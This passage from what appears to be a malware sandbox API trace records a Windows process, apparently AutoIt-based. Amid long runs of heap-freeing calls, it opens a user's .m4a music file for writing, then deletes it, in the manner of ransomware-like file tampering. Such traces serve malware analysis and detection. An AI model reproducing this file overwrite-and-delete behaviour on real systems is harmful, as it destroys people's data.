hHeap=0x770000) returned 1 [0037.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0037.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0037.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0037.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0037.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0037.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0037.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0037.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0037.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0037.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0037.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0037.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0037.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0037.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0037.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0037.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0037.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0037.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0037.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0037.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0037.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0037.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0037.856] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.856] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.857] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.857] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0037.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0037.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0037.857] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.857] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.857] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.857] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.857] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.857] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.857] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.857] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.857] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.857] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.857] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0037.857] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.857] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.857] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.857] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.857] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.858] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0037.858] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.858] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\z7Rh4U-493ioKt.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\7d68killni\\z7rh4u-493iokt.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0037.858] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0037.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0037.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0037.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0037.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0037.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0037.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0037.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0037.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0037.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0037.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0037.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0037.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0037.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0037.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0037.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0037.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0037.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0037.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0037.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0037.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0037.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0037.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0037.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0037.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0037.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0037.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0037.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0037.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0037.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0037.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0037.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0037.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0037.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0037.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0037.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0037.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0037.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0037.859] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.859] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.859] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.859] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0037.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0037.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.859] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.859] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.859] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.860] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0037.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0037.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0037.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0037.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0037.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0037.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0037.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0037.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0037.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0037.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0037.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0037.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0037.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0037.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0037.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0037.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0037.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0037.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0037.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0037.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0037.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0037.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0037.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0037.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0037.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0037.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0037.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0037.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0037.860] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.860] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.861] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.861] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.861] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0037.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0037.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.861] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.861] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.861] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.861] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0037.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0037.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0037.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0037.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0037.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0037.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0037.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0037.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0037.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0037.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0037.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0037.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0037.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.861] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.861] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.861] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.862] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\z7Rh4U-493ioKt.m4a", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\z7Rh4U-493ioKt.m4a", lpFilePart=0x0) returned 0x41 [0037.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0037.862] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\z7Rh4U-493ioKt.m4a", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7a885f0, ftCreationTime.dwHighDateTime=0x1d5bfd6, ftLastAccessTime.dwLowDateTime=0xf32dd8d0, ftLastAccessTime.dwHighDateTime=0x1d5c53e, ftLastWriteTime.dwLowDateTime=0x16462da0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x2ddd, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="z7Rh4U-493ioKt.m4a", cAlternateFileName="Z7RH4U~1.M4A")) returned 0x7c2240 [0037.862] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\z7Rh4U-493ioKt.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\7d68killni\\z7rh4u-493iokt.m4a")) returned 1 [0037.863] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7a885f0, ftCreationTime.dwHighDateTime=0x1d5bfd6, ftLastAccessTime.dwLowDateTime=0xf32dd8d0, ftLastAccessTime.dwHighDateTime=0x1d5c53e, ftLastWriteTime.dwLowDateTime=0x16462da0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x2ddd, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="z7Rh4U-493ioKt.m4a", cAlternateFileName="Z7RH4U~1.M4A")) returned 0 [0037.863] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0037.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0037.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0037.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0037.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0037.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0037.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0037.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0037.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0037.863] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0037.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0037.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0037.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0037.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0037.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0037.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0037.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0037.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0037.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0037.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0037.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac320 | out: hHeap=0x770000) returned 1 [0037.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0037.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0037.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0037.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0037.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0037.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0037.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0037.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0037.864] HeapFree (in: 